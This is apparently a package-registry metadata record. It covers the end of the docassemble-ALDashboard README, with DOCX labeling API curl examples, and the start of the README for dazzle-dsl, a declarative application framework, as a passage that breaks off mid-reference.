reuses the same authenticated request context (for example `X-API-Key` or `Authorization`) and does not require storing a separate API key in MCP configuration. ### DOCX Modes and End-to-End Workflow Purpose of each mode: 1. `POST /docx/runs`: inspection mode - Returns `[paragraph_index, run_index, run_text]`. - Use this to understand document coordinates before deterministic edits. 2. `POST /docx/auto-label`: draft generation mode - Generates initial label suggestions (`results`). 3. `POST /docx/relabel`: editing/apply mode - Edits draft labels (`replace_labels_by_index`, `skip_label_indexes`, `add_labels`, `add_label_rules`). - If DOCX content is provided and `include_labeled_docx_base64=true`, returns an updated DOCX. 4. `GET /jobs/{job_id}/download`: async file download mode - Streams final binary output from completed async jobs. Full workflow: upload DOCX -> draft labels -> manual edits (change, delete, add) -> download final DOCX Step 1. Create draft labels (async) ```bash curl -X POST "https://YOURSERVER/al/api/v1/dashboard/docx/auto-label" \ -H "X-API-Key: YOUR_API_KEY" \ -F "mode=async" \ -F "file=@/path/to/input.docx" \ -F "openai_base_url=https://YOURRESOURCE.openai.azure.com/openai/v1/" \ -F "openai_api=YOUR_AZURE_OPENAI_KEY" \ -F "openai_model=gpt-5-mini" ``` Step 2. Poll job until `status=succeeded`, then read `data.results` ```bash curl -H "X-API-Key: YOUR_API_KEY" \ "https://YOURSERVER/al/api/v1/dashboard/jobs/JOB_ID_FROM_STEP_1" ``` Step 3. Edit labels manually (change one, delete one, add one) and request final DOCX (async) ```bash curl -X POST "https://YOURSERVER/al/api/v1/dashboard/docx/relabel" \ -H "Content-Type: application/json" \ -H "X-API-Key: YOUR_API_KEY" \ -d '{ "mode": "async", "filename": "input.docx", "file_content_base64": "BASE64_DOCX_HERE", "results": [[1,0,"{{ letter_date }}",0],[2,0,"{{ old_name }}",0],[3,0,"{{ keep_me }}",0]], "replace_labels_by_index": {"0":"{{ edited_letter_date }}"}, "skip_label_indexes": [1], "add_labels": [[0,0,"{{ added_new_label }}",0]], "include_labeled_docx_base64": true }' ``` Step 4. Poll relabel job, then download final DOCX ```bash curl -H "X-API-Key: YOUR_API_KEY" \ "https://YOURSERVER/al/api/v1/dashboard/jobs/JOB_ID_FROM_STEP_3" curl -L -o final_labeled.docx \ -H "X-API-Key: YOUR_API_KEY" \ "https://YOURSERVER/al/api/v1/dashboard/jobs/JOB_ID_FROM_STEP_3/download" ``` ## Some screenshots ### Main page ![A screenshot of the ALDashboard menu with choices: "Admin only - manage users", "Admin only - stats", "Install assembly line", "Verify API Keys", "Install packages", "update packages", "Package scanner", "View Answer files", "generate review screen draft", "validate docx template", "validation translation files", "prepare translation files", "validate an attachment fields block", "PDF tools", and "Compile Bootstrap theme"](https://github.com/SuffolkLITLab/docassemble-ALDashboard/assets/6252212/29539eec-3891-476b-b248-dd3db986d899) ### Manage users ![A screenshot that says "Manage users" with the fields "User", "What do you want want to do? Reset password or Change user permissions", "New Password", and "Verify new Password"](https://user-images.githubusercontent.com/7645641/123702231-e069ec00-d830-11eb-94dc-5ec0abb86bc9.png) ### Bulk install packages from GitHub ![A screenshot that says "What packages do you want to install?" The fields are for "Github URL", "YAML filename", and "Short name or alias (no spaces)"](https://user-images.githubusercontent.com/7645641/123702290-efe93500-d830-11eb-9fdf-a5935ff4078e.png) ### Bulk update packages ![A screenshot that says "What packages do you want to update?" followed by a list of packages. For example, "docassemble.209aPlaintiffMotionToModify", "docassemble.ALAffidavitOfIndigency", and more.](https://user-images.githubusercontent.com/7645641/123702362-068f8c00-d831-11eb-9ce4-df7a67ffcfeb.png) ### View answer files View / search sessions by user and interview name ![A screenshot that says "What interview do you want to view sessions for?" The fields are "File name" and "User (leave blank to view all sessions)"](https://user-images.githubusercontent.com/7645641/123702422-1d35e300-d831-11eb-84d5-5e7385deb901.png) ![A screenshot that says "Recently generated sessions for docassemble.MA209AProtectiveOrder:data/questions/209a_package.yml" with 5 sessions below.](https://user-images.githubusercontent.com/7645641/123702464-2cb52c00-d831-11eb-80fc-f2291e824eae.png) ### View interview stats captured with `store_variables_snapshot()` ![A screenshot with the title "Stats for Eviction Moratorium: 9". Below is the text "Total submissions: 9", "Group by: zip | state | modtime", and "Excel Download" followed by a map that can be filtered by state or by date.](https://user-images.githubusercontent.com/7645641/123702623-5e2df780-d831-11eb-8937-6625df74ab22.png) ### Generate a bootstrap theme ![A screenshot with the title "Your file is compiled!", below is the text "You can view and copy your file, or download it directly by right clicking the link to save it as a CSS file". Below that are examples of Bootstrap components like buttons and nav bars.](https://github.com/SuffolkLITLab/docassemble-ALDashboard/assets/6252212/079e428d-4cae-4f75-8b1b-227c28f32a44)
text/markdown
Quinten Steenhuis
Suffolk Legal Innovation and Technology Lab <litlab@suffolk.edu>
null
null
null
null
[]
[]
https://github.com/SuffolkLITLab/docassemble-ALDashboard
null
null
[]
[]
[]
[ "PyGithub>=2.1.1", "docassemble.ALToolbox>=0.9.2", "python-docx>=1.1.1", "openai>=1.0", "tiktoken", "pyaml", "formfyxer>=1.0.1", "dayamlchecker>=0.2.0", "pyspellchecker>=0.6.3", "ruamel.yaml>=0.17.4", "textstat>=0.7.0" ]
[]
[]
[]
[ "Homepage, https://courtformsonline.org" ]
twine/6.2.0 CPython/3.13.11
2026-02-19T22:00:40.177571
docassemble_aldashboard-1.1.1.tar.gz
186,197
af/5a/c215d64414a1f976814252efe7288ab69e03572fec810940fa52e45d827e/docassemble_aldashboard-1.1.1.tar.gz
source
sdist
null
false
d1624ddda4cf310c65ba3c8d1112e5cb
8a157257262ff3acc5c0906c46c999b97bb48749ebd16e6237c568191096b4da
af5ac215d64414a1f976814252efe7288ab69e03572fec810940fa52e45d827e
MIT
[ "LICENSE" ]
0
2.4
dazzle-dsl
0.33.1
DAZZLE - Domain-Aware, Token-Efficient DSL for LLM-Enabled Apps
# DAZZLE **Human Intent → Structured DSL → Deterministic Code → Frontier AI Cognition** <!-- Versions & Compatibility --> [![Python 3.11+](https://img.shields.io/badge/python-3.11%2B-blue)](https://www.python.org/) [![Homebrew](https://img.shields.io/badge/homebrew-manwithacat%2Ftap-orange)](https://github.com/manwithacat/homebrew-tap) <!-- Build & Quality --> [![CI](https://github.com/manwithacat/dazzle/workflows/CI/badge.svg)](https://github.com/manwithacat/dazzle/actions) [![codecov](https://codecov.io/gh/manwithacat/dazzle/graph/badge.svg)](https://codecov.io/gh/manwithacat/dazzle) [![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff) [![Checked with mypy](https://img.shields.io/badge/mypy-checked-blue.svg)](https://mypy-lang.org/) <!-- Meta --> [![Docs](https://img.shields.io/badge/docs-GitHub%20Pages-blue)](https://manwithacat.github.io/dazzle/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![GitHub stars](https://img.shields.io/github/stars/manwithacat/dazzle.svg?style=social)](https://github.com/manwithacat/dazzle) DAZZLE is a **declarative application framework**. You describe *what* your application is — its data, its screens, its workflows, its users — and Dazzle figures out *how* to build it. You write `.dsl` files; Dazzle gives you a working web application with a database, API, rendered UI, authentication, and CRUD operations. No code generation step, no build toolchain, no scaffold to maintain. ```bash cd examples/simple_task && dazzle serve # UI: http://localhost:3000 # API: http://localhost:8000/docs ``` --- ## Table of Contents - [The Core Idea](#the-core-idea) - [Quick Start](#quick-start) - [How Dazzle Works: The Eight Layers](#how-dazzle-works-the-eight-layers) - [Layer 1: Entities](#layer-1-entities-your-data-model) - [Layer 2: Surfaces](#layer-2-surfaces-your-ui) - [Layer 3: Workspaces](#layer-3-workspaces-your-dashboards) - [Layer 4: Stories and Processes](#layer-4-stories-and-processes-your-business-logic) - [Layer 5: Services](#layer-5-services-your-custom-code) - [Layer 6: The Public Site](#layer-6-the-public-site) - [Layer 7: Experiences](#layer-7-experiences-multi-step-user-flows) - [Layer 8: Islands](#layer-8-islands-client-side-interactivity) - [How the Layers Work Together](#how-the-layers-work-together) - [The Pipeline: Determinism and Cognition](#the-pipeline-determinism-and-cognition) - [DSL Constructs Reference](#dsl-constructs-reference) - [The MCP Tooling Pipeline](#the-mcp-tooling-pipeline) - [Agent Framework](#agent-framework) - [Three-Tier Testing](#three-tier-testing) - [API Packs](#api-packs) - [Fidelity Scoring](#fidelity-scoring) - [Why HTMX, Not React](#why-htmx-not-react) - [Install](#install) - [IDE Support](#ide-support) - [Examples](#examples) - [Project Structure](#project-structure) - [Documentation](#documentation) - [Contributing](#contributing) - [License](#license) --- ## The Core Idea Dazzle is built on one principle: **the DSL is the application**. There is no code generation step that produces source files you then maintain. The DSL is parsed into a semantic intermediate representation (the AppSpec IR), and the runtime executes that IR directly. ``` DSL Files → Parser + Linker → AppSpec (IR) → Runtime (live app) → OpenAPI / AsyncAPI specs → Test generation → Fidelity scoring ``` This means: - **Change the DSL, refresh the browser.** The runtime re-reads the IR on every request in dev mode. - **No generated code to keep in sync.** The DSL is the single source of truth. - **Every artifact is derivable.** API specs, test suites, demo data, and documentation are all computed from the same IR. - **The DSL is analyzable.** Because it is deliberately anti-Turing (no arbitrary computation), Dazzle can validate, lint, measure fidelity, and reason about your application statically. "Declarative" does not mean "limited." Dazzle has a layered architecture that lets you start simple and add complexity only where your business genuinely needs it. A todo app is 20 lines of DSL. A 39-entity accountancy SaaS with state machines, double-entry ledgers, multi-step onboarding wizards, and role-based dashboards is the same language — just more of it. ## Quick Start ```bash # Install brew install manwithacat/tap/dazzle # macOS/Linux (auto-registers MCP server) # or: pip install dazzle-dsl # Run the example cd examples/simple_task dazzle serve # Open http://localhost:3000 for the UI # Open http://localhost:8000/docs for the API ``` That's it. No code generation, no build step — your DSL runs directly. ### First DSL File ```dsl module my_app app todo "Todo Application" entity Task "Task": id: uuid pk title: str(200) required completed: bool=false created_at: datetime auto_add surface task_list "Tasks": uses entity Task mode: list section main: field title "Title" field completed "Done" ``` Save this as `app.dsl`, run `dazzle serve`, and you have a working application with: - A database table with correct column types and constraints - CRUD API endpoints with pagination, filtering, and sorting - A rendered list UI with sortable columns and a create form - OpenAPI documentation at `/docs` --- ## How Dazzle Works: The Eight Layers Dazzle has eight conceptual layers, each handling a different concern. Understanding these layers — and knowing which one is responsible for what — is the key to working effectively with the system. ### Layer 1: Entities (Your Data Model) An entity is a business concept expressed as structured data. Think of it as a database table, but described at the semantic level rather than the SQL level. ```dsl entity Company "Company": id: uuid pk company_name: str required company_number: str required unique is_vat_registered: bool = false trading_status: enum[active, dormant, struck_off] = active vat_number: str created_at: datetime auto_add updated_at: datetime auto_update ``` What Dazzle does with this: - Creates a database table with correct column types - Enforces `required` and `unique` constraints - Sets default values (e.g., `is_vat_registered = false`, `trading_status = active`) - Generates `auto_add` timestamps on creation and `auto_update` on every save - Builds a repository with CRUD operations (create, read, update, delete, list with pagination) **This is critical to understand:** When your entity says `trading_status: enum[...] = active`, every new Company record gets `trading_status = active` automatically. No process needs to "set" it. No service needs to assign it. The entity layer handles it at creation time. #### State Machines Entities can declare allowed transitions between enum values: ```dsl entity Task "Task": id: uuid pk title: str(200) required status: enum[todo, in_progress, review, done] = todo assigned_to: ref User transitions: todo -> in_progress in_progress -> review review -> done review -> in_progress done -> todo: role(admin) ``` This means you cannot set `status` to `done` without going through `review` first, and you cannot reopen a `done` task unless you have the admin role. The entity layer enforces this at the API boundary — no process or service code needed. State machines also support auto-transitions with time delays: ```dsl transitions: pending -> expired: auto after 30 days pending -> active: requires payment_confirmed ``` #### Relationships Entities link to each other with typed relationships: ```dsl entity OrderItem "Order Item": id: uuid pk order: ref Order # Foreign key product: ref Product quantity: int required entity Order "Order": id: uuid pk customer: ref Customer items: has_many OrderItem cascade # Delete items when order deleted shipping_address: embeds Address # Embedded value object invoice: has_one Invoice restrict # Prevent delete if invoice exists ``` **Relationship types:** `ref` (foreign key), `has_many` (one-to-many with ownership), `has_one` (one-to-one), `belongs_to` (inverse FK), `embeds` (embedded value type) **Delete behaviors:** `cascade` (delete children), `restrict` (prevent delete), `nullify` (set FK to null), `readonly` (immutable relationship) #### Invariants Cross-field business rules that the entity layer enforces: ```dsl entity Task "Task": ... invariants: urgent_needs_date: "Urgent tasks must have a due date" when priority = "urgent" then due_date is not null error_code: TASK_URGENT_NO_DATE ``` #### Archetypes Reusable field templates that entities can inherit: ```dsl archetype Timestamped: created_at: datetime auto_add updated_at: datetime auto_update archetype Auditable extends Timestamped: created_by: ref User updated_by: ref User entity Invoice "Invoice": extends Auditable ... ``` #### Sensitive Fields Fields containing PII or credentials can be marked `sensitive` for automatic masking and compliance: ```dsl entity Employee "Employee": id: uuid pk name: str(200) required bank_account: str(8) sensitive ni_number: str(9) required sensitive ``` This modifier: - **Masks values in list views** — displays `****1234` (last 4 characters visible) - **Excludes from filters** — sensitive fields cannot be used as filter criteria - **Marks in OpenAPI** — adds `x-sensitive: true` extension to the schema - **Flags in entity schema** — available for compliance scanning and audit tooling #### Semantic Metadata Entities carry metadata that helps both LLMs and Dazzle's tooling understand intent: ```dsl entity CustomerDueDiligence "Customer Due Diligence": intent: "Track KYC/AML verification status for regulatory compliance" domain: compliance patterns: lifecycle, audit, searchable ... ``` ### Layer 2: Surfaces (Your UI) A surface defines how users see and interact with entity data. It maps fields to screens. ```dsl surface company_list "Companies": uses entity Company mode: list section main: field company_name "Name" field trading_status "Status" field is_vat_registered "VAT Registered" ux: purpose: "Browse and manage client companies" sort: company_name asc filter: trading_status, is_vat_registered search: company_name, company_number empty: "No companies yet. Add your first client!" ``` What Dazzle does with this: - Registers an HTTP route (`/companies`) - Renders a DataTable with sortable column headers, filter dropdowns, debounced search, and pagination - Generates create, edit, detail, and delete surfaces from the same entity - All interaction is server-rendered HTML with HTMX for partial updates — no JavaScript framework required The `ux:` block is the semantic layer. It tells Dazzle *what interactive features this table needs*, and the runtime translates that into clickable sort arrows, `<select>` filter dropdowns, and a search input with 300ms debounce. **Surface modes:** `list` (data table), `view` (detail page), `create` (form), `edit` (form), `custom` (free-form) #### Attention Signals Surfaces can declare conditions that should draw user attention: ```dsl ux: attention: critical: status = "overdue" -> "This item is overdue" warning: due_date < today and status != "done" -> "Approaching deadline" ``` When rows match these conditions, the UI highlights them — red background for critical, yellow for warning — with the message shown as a tooltip. The workspace region renderer evaluates these signals against every row and picks the highest severity. #### Persona Variants The same surface can show different fields, scopes, or behaviors to different user roles: ```dsl ux: for admin: scope: all purpose: "Full company management" action_primary: company_create for agent: scope: assigned_agent = current_user purpose: "View assigned companies" read_only: true hide: internal_notes, margin_percentage ``` ### Layer 3: Workspaces (Your Dashboards) A workspace composes multiple data views into a single dashboard page. Where surfaces show one entity, workspaces aggregate across many. ```dsl workspace admin_dashboard "Admin Dashboard": purpose: "Practice-wide operational visibility" stage: "command_center" practice_kpis: source: Company display: metrics aggregate: total_clients: count(Company) active_subscriptions: count(ClientSubscription where status = active) overdue_deadlines: count(ComplianceDeadline where due_date < today and status != completed) onboarding_pipeline: source: OnboardingFlow filter: completed_at = null sort: started_at asc limit: 10 display: list action: onboarding_flow_detail empty: "No active onboardings" urgent_tasks: source: Task filter: priority = urgent and status != done sort: due_date asc limit: 5 display: list action: task_detail ``` Each workspace has **regions** — the named blocks like `practice_kpis` and `onboarding_pipeline`. Regions can be: - **Data regions** (`display: list`): Show filtered, sorted entity rows — like a mini surface with sortable headers, status badges, filter dropdowns, and row-click navigation - **Aggregate regions** (`display: metrics`): Show KPI metric cards computed from `count()`, `sum()`, `avg()`, `min()`, `max()` expressions - **Detail regions** (`display: detail`): Show a single record - **Grid regions** (`display: grid`): Card-based grid layout The `stage:` controls the CSS grid layout: | Stage | Layout | Use Case | |-------|--------|----------| | `focus_metric` | Single column, hero stat + supporting | KPI dashboard | | `scanner_table` | Full-width table + optional sidebar | Data browser | | `dual_pane_flow` | 2-column master-detail | List + detail | | `monitor_wall` | 2x2 or 2x3 grid | Status wall | | `command_center` | 12-column grid with region spans | Operations hub | At runtime, each region gets its own HTMX endpoint (`/api/workspaces/admin_dashboard/regions/practice_kpis`) that returns rendered HTML fragments. The workspace page loads instantly with skeleton placeholders, then each region fills in asynchronously. Column rendering is type-aware: enum fields render as colored badges, booleans as check/cross icons, dates as relative times ("2 hours ago"), and money fields with currency symbols. Enum and boolean columns automatically get filter dropdowns. State-machine status fields are filterable by their allowed states. ### Layer 4: Stories and Processes (Your Business Logic) This is where Dazzle's architecture gets interesting, and where the layer separation matters most. **Stories** describe *what should happen* from a user's perspective: ```yaml story_id: ST-161 title: "Staff completes onboarding and provisions client access" actor: Agent trigger: form_submitted scope: - OnboardingFlow - OnboardingChecklist - Contact - EngagementLetter - ClientSubscription happy_path_outcome: - "OnboardingChecklist.services_selected = true" - "OnboardingFlow.stage transitions to complete" - "OnboardingFlow.completed_at set to current timestamp" - "Contact.onboarding_complete = true" - "EngagementLetter created in draft status" - "ClientSubscription created for selected service package" side_effects: - "Notification sent to client with portal access details" - "AuditLog entry records onboarding completion" - "Task created for agent to initiate CDD process" ``` **Processes** describe *how* the steps are orchestrated: ```yaml name: staff_onboarding_flow implements: - ST-156 - ST-157 - ST-158 - ST-161 trigger: kind: manual entity_name: OnboardingFlow steps: - name: check_existing_flow kind: service service: OnboardingFlow.check_unique_contact - name: create_flow kind: service service: OnboardingFlow.create_or_update - name: create_checklist kind: service service: OnboardingChecklist.create - name: complete_onboarding kind: service service: OnboardingFlow.complete - name: notify_client kind: service service: Notification.send_portal_access - name: create_cdd_task kind: service service: Task.create_cdd_task - name: log_completion kind: service service: AuditLog.create compensations: - name: rollback_subscription service: ClientSubscription.delete - name: rollback_flow service: OnboardingFlow.delete events: on_start: onboarding.staff_initiated on_complete: onboarding.staff_completed ``` **Here is the key insight:** The process defines *step ordering*, *failure recovery* (compensations), and *event emission*. It does NOT specify field values like "set completion_percentage to 100" — those are handled by entity defaults (Layer 1) and service implementations (Layer 5). The process orchestrates *when* things happen; the services know *what* to do. Processes also support: - **Human tasks** — steps that wait for user input before continuing - **Retry policies** — automatic retry with backoff on failure - **Timeout policies** — deadlines for step completion - **Overlap policies** — whether multiple instances can run concurrently - **Compensation** — rollback in reverse order when a step fails (saga pattern) ### Layer 5: Services (Your Custom Code) Dazzle's DSL is deliberately **anti-Turing** — you cannot write arbitrary computation in it. This is a feature, not a limitation. It means the DSL is always analyzable, validatable, and safe. When you need real business logic — VAT calculations, NINO validation, Companies House API calls — you declare a **domain service** in the DSL and implement it in a **stub**: ```dsl service calculate_vat "Calculate VAT": kind: domain_logic input: invoice_id: uuid required country_code: str(2) output: vat_amount: decimal(10,2) breakdown: json guarantees: - "Must not mutate the invoice record" stub: python ``` Dazzle auto-generates a typed Python function signature in `stubs/calculate_vat.py`. You fill in the implementation. The DSL declares the contract (inputs, outputs, guarantees); the stub provides the computation. **Service kinds:** `domain_logic` (pure business rules), `validation` (input checking), `integration` (external API calls), `workflow` (multi-step orchestration) This is also how external APIs are declared. Dazzle ships with API packs for Stripe, HMRC, Xero, Companies House, DocuSeal, SumSub, and Ordnance Survey — each pack generates the service DSL and foreign model definitions for you. ### Layer 6: The Public Site Dazzle separates your public marketing site from your application. The site is defined in two files: - **`sitespec.yaml`** — Structure: page routes, navigation, section types, brand configuration - **`copy.md`** — Content: headlines, feature descriptions, testimonials, calls to action At runtime, copy is merged into sitespec sections. This separation means a copywriter can edit `copy.md` without touching the structural layout, and a designer can restructure pages in `sitespec.yaml` without rewriting content. Pages use typed sections (`hero`, `features`, `comparison`, `card_grid`, `trust_bar`, `cta`, `markdown`) that Dazzle renders into themed HTML. Page types include `landing`, `pricing`, `legal` (terms, privacy), and custom pages. The site layer also includes brand configuration (logo, tagline, colors), navigation structure, footer layout, and authentication page styling. ### Layer 7: Experiences (Multi-Step User Flows) Experiences define wizard-like flows that guide users through multiple screens: ```dsl experience client_onboarding "Client Onboarding": start at step welcome step welcome: kind: surface surface onboarding_welcome on continue -> step basics step basics: kind: surface surface onboarding_basics on continue -> step business_type on back -> step welcome step business_type: kind: surface surface onboarding_business_type on continue -> step business_details on back -> step basics step complete: kind: surface surface onboarding_complete ``` Each step references a surface, and transitions are driven by user events (`continue`, `back`, `success`, `failure`). Steps can also be `kind: process` (trigger a backend process) or `kind: integration` (call an external API). The experience layer handles navigation state; the surfaces handle data display; the processes handle data manipulation. ### Layer 8: Islands (Client-Side Interactivity) Dazzle's default UI is fully server-rendered with HTMX. But sometimes you need a chart, a drag-and-drop board, or a real-time widget that genuinely requires client-side JavaScript. That is what **islands** are for — self-contained interactive components embedded within server-rendered pages. ```dsl island task_chart "Task Progress Chart": entity: Task src: "islands/task-chart/index.js" fallback: "Loading task chart..." prop chart_type: str = "bar" prop date_range: str = "30d" event chart_clicked: detail: [task_id, series] ``` What Dazzle does with this: - **Renders a container** in the page with server-side fallback content shown before JS loads - **Loads the JS entry point** from `src` (defaults to `/static/islands/{name}/index.js`) - **Passes typed props** as `data-island-props` JSON attributes - **Auto-generates a data endpoint** at `/api/islands/{island_name}/data` when `entity:` is declared, proxying to the entity's CRUD service with pagination Islands are intentionally opt-in and isolated. The server-rendered HTMX approach handles 90%+ of UI needs; islands handle the remaining cases where client-side rendering adds genuine value (charts, maps, rich editors, real-time dashboards). **Props**: Typed key-value pairs passed to the island (`str`, `int`, `bool`, `float` with optional defaults) **Events**: CustomEvent schemas the island may emit, with typed detail fields. The server can listen for these via HTMX's `hx-on` or standard `addEventListener`. --- ## How the Layers Work Together Here is a concrete example: a staff member onboards a new limited company client. 1. **Entity layer**: Company has `trading_status = active` as default. OnboardingFlow has `stage = started` and `flow_type = self_service` as defaults. 2. **Experience layer**: The onboarding experience defines the step sequence — welcome → basics → business type → business details → complete. 3. **Surface layer**: Each experience step renders a surface. The `company_create` surface shows a form with company_name and company_number fields. The `ux:` block adds search and validation. 4. **Process layer**: The `staff_onboarding_flow` process orchestrates the multi-entity operations — create OnboardingFlow, create OnboardingChecklist, create Company, create CompanyContact link, create EngagementLetter, create ClientSubscription. If any step fails, compensations roll back in reverse order. 5. **Service layer**: Each process step calls a service. `OnboardingFlow.complete` sets completed_at, updates completion_percentage, marks Contact.onboarding_complete. `Notification.send_portal_access` sends the welcome email. 6. **Workspace layer**: After onboarding, the admin_dashboard workspace shows updated metrics — `total_clients` count increments, the `onboarding_pipeline` region drops the completed flow. 7. **Site layer**: Meanwhile, the public site at `/pricing` shows the service packages available for new clients, driven entirely by sitespec.yaml + copy.md. 8. **Island layer**: A chart on the admin dashboard shows onboarding completion rates over time — rendered client-side with Chart.js, fed by an auto-generated data endpoint. Each layer does one thing well and delegates everything else: | If you need... | You write... | You DON'T write... | |---|---|---| | A data model with defaults | Entity DSL | Migration scripts, ORM models | | A CRUD interface | Surface DSL | HTML templates, API routes, pagination logic | | A dashboard | Workspace DSL | Dashboard components, data-fetching hooks | | Business workflow | Process definition | Saga coordinators, event handlers | | Custom logic | Service stub | Framework boilerplate, dependency injection | | A marketing site | sitespec.yaml + copy.md | Landing page HTML, CSS, routing | | A multi-step wizard | Experience DSL | Router configuration, step state management | | A chart or rich widget | Island DSL + JS file | Data-fetching boilerplate, container plumbing | --- ## The Pipeline: Determinism and Cognition DAZZLE separates work into two distinct phases: a **deterministic foundation** that requires zero LLM involvement, and a **cognitive layer** where LLM creativity adds value. ``` ┌─────────────────────────────────────────────────────────────────────────────────┐ │ DETERMINISTIC PHASE (no LLM) │ ├─────────────────────────────────────────────────────────────────────────────────┤ │ │ │ ┌───────────┐ ┌────────────┐ ┌───────────┐ ┌─────────────────┐ │ │ │ DSL Files │ ───▶ │ Parser │ ───▶ │ AppSpec │ ───▶ │ Runtime / Specs │ │ │ │ (.dsl) │ │ + Linker │ │ (IR) │ │ │ │ │ └───────────┘ └────────────┘ └───────────┘ └─────────────────┘ │ │ │ │ │ │ │ │ ▼ ▼ ▼ ▼ │ │ Artifacts: Artifacts: Artifacts: Artifacts: │ │ • core.dsl • AST • Entity graph • OpenAPI spec │ │ • ui.dsl • Symbol table • Surface defs • AsyncAPI spec │ │ • *.dsl • Module graph • Type catalog • Running app │ │ • Validation • HTML templates │ │ │ └─────────────────────────────────────────────────────────────────────────────────┘ │ ▼ ┌─────────────────────────────────────────────────────────────────────────────────┐ │ COGNITIVE PHASE (LLM-assisted) │ ├─────────────────────────────────────────────────────────────────────────────────┤ │ │ │ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────────────────┐ │ │ │ Story Proposal │ │ Test Design │ │ Process Orchestration │ │ │ │ │ │ │ │ │ │ │ │ "User creates │ │ Persona-based │ │ Multi-step workflows │ │ │ │ a task and │ │ test coverage │ │ with compensations │ │ │ │ assigns it" │ │ proposals │ │ │ │ │ └─────────────────┘ └─────────────────┘ └─────────────────────────────┘ │ │ │ │ │ │ │ ▼ ▼ ▼ │ │ Artifacts: Artifacts: Artifacts: │ │ • stories.yaml • test_designs.yaml • processes.yaml │ │ • CRUD coverage • Playwright tests • State diagrams │ │ • Edge cases • E2E scenarios • Saga definitions │ │ │ │ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────────────────┐ │ │ │ Demo Data │ │ Tenancy & │ │ Fidelity & Gap Analysis │ │ │ │ │ │ Compliance │ │ │ │ │ │ Realistic │ │ Inference │ │ Spec vs. rendered HTML │ │ │ │ seed data │ │ │ │ cross-tool issue reports │ │ │ │ per-persona │ │ │ │ │ │ │ └─────────────────┘ └─────────────────┘ └─────────────────────────────┘ │ │ │ │ │ │ │ ▼ ▼ ▼ │ │ Artifacts: Artifacts: Artifacts: │ │ • demo_blueprint.yaml • Tenancy config • Fidelity scores │ │ • CSV/JSONL exports • PII/GDPR hints • Unified issues │ │ • Tenant fixtures • Compliance frameworks • Coverage gaps │ │ │ └─────────────────────────────────────────────────────────────────────────────────┘ ``` | Phase | Characteristics | Token Cost | Error Rate | |-------|----------------|------------|------------| | **Deterministic** | Parsing, linking, validation, runtime execution | Zero | Near-zero (compiler-checked) | | **Cognitive** | Story generation, test proposals, gap analysis | One-time per feature | Reviewable artifacts | The deterministic phase handles all the mechanical work that LLMs do poorly: parsing grammars, resolving references, type checking, and generating correct code. The cognitive phase leverages what LLMs do well: understanding intent, proposing test scenarios, and identifying gaps. --- ## DSL Constructs Reference Complete reference: [docs/reference/](docs/reference/) ### Core | Construct | Purpose | |-----------|---------| | `module` | Namespace declaration for DSL files | | `app` | Application metadata | | `use` | Import constructs from other modules | ### Data Modeling | Construct | Purpose | |-----------|---------| | `entity` | Domain models with typed fields, relationships, state machines, invariants, and access control | | `enum` | Shared enum definitions reusable across entities (e.g., `OrderStatus` with labeled values) | | `archetype` | Reusable field templates (e.g., `Timestamped`, `Auditable`) | | `foreign_model` | External API data structures (read-only, event-driven, or batch-imported) | **Field Types**: `str(N)`, `text`, `int`, `decimal(P,S)`, `bool`, `date`, `datetime`, `uuid`, `email`, `json`, `money`, `file`, `url`, `timezone`, `enum[...]` **Relationship Types**: `ref`, `has_many`, `has_one`, `belongs_to`, `embeds` **Field Modifiers**: `required`, `optional`, `pk`, `unique`, `unique?`, `auto_add`, `auto_update`, `sensitive`, `=default` **Entity Blocks**: `transitions` (state machine), `invariants` (business rules), `access` (role/owner/tenant permissions), `computed` (derived fields), `examples` (fixture data), `publishes` (event declarations) ### UI Layer | Construct | Purpose | |-----------|---------| | `surface` | UI screens and forms (list, view, create, edit, custom modes) | | `workspace` | Dashboards with regions, filters, aggregates, and layout stages | | `experience` | Multi-step wizards and user flows | | `island` | Client-side interactive components (charts, maps, rich editors) with typed props, events, and optional entity data binding | | `view` | Read-only projections with grouping and aggregates (`sum`, `count`, `avg`) for dashboards and reports | **Surface Elements**: `section`, `field`, `action`, `outcome` **Workspace Elements**: `source`, `filter`, `sort`, `limit`, `display`, `aggregate`, `group_by`, `action` **Workspace Stages**: `focus_metric`, `scanner_table`, `dual_pane_flow`, `monitor_wall`, `command_center` **Experience Steps**: `kind: surface`, `kind: process`, `kind: integration` with event-driven transitions ### UX Semantic Layer | Construct | Purpose | |-----------|---------| | `ux` | UI hints block within surfaces | | `attention` | Conditional alerts (critical, warning, notice, info) | | `for` | Persona-specific view customization (scope, show/hide, read_only, defaults) | **UX Properties**: `purpose`, `show`, `hide`, `sort`, `filter`, `search`, `empty` ### Services and Integrations | Construct | Purpose | |-----------|---------| | `service` | External APIs (with OpenAPI spec) or domain services (with typed input/output/guarantees) | | `integration` | Orchestrates data flow between app and external services | **Service Kinds**: `domain_logic`, `validation`, `integration`, `workflow` **Integration Elements**: `action` (request-response), `sync` (scheduled or event-driven data synchronization) ### Messaging | Construct | Purpose | |-----------|---------| | `message` | Typed message schemas | | `channel` | Communication pathways (email, queue, stream) | | `template` | Reusable message templates with attachments | **Send Triggers**: Entity events, status transitions, field changes, service events, schedules ### Ledgers and Transactions | Construct | Purpose | |-----------|---------| | `ledger` | TigerBeetle account templates for double-entry accounting | | `transaction` | Multi-leg financial transactions with atomic guarantees | ```dsl ledger CustomerWallet "Customer Wallet": account_code: 1001 ledger_id: 1 account_type: asset currency: GBP flags: debits_must_not_exceed_credits sync_to: Customer.balance_cache transaction RecordPayment "Record Payment": execution: async priority: high transfer revenue: debit: CustomerWallet credit: Revenue amount: payment.amount code: 1 flags: linked idempotency_key: payment.id ``` **Account Types**: `asset`, `liability`, `equity`, `revenue`, `expense` ### Governance and Automation | Construct | Purpose | |-----------|---------| | `webhook` | Outbound HTTP notifications on entity events with HMAC/bearer/basic auth and retry policies | | `approval` | Approval gates with quorum, threshold conditions, time-based escalation, and auto-approve rules | | `sla` | Service level agreements with deadline tiers, business hours, pause conditions, and breach actions | ### Personas and Scenarios | Construct | Purpose | |-----------|---------| | `persona` | User archetypes with goals, proficiency levels, default workspaces | | `scenario` | Named application states for development and demos | ```dsl persona admin "Administrator": description: "Full system access for practice management" goals: manage_clients, monitor_compliance, configure_system proficiency: expert default_workspace: admin_dashboard scenario busy_sprint 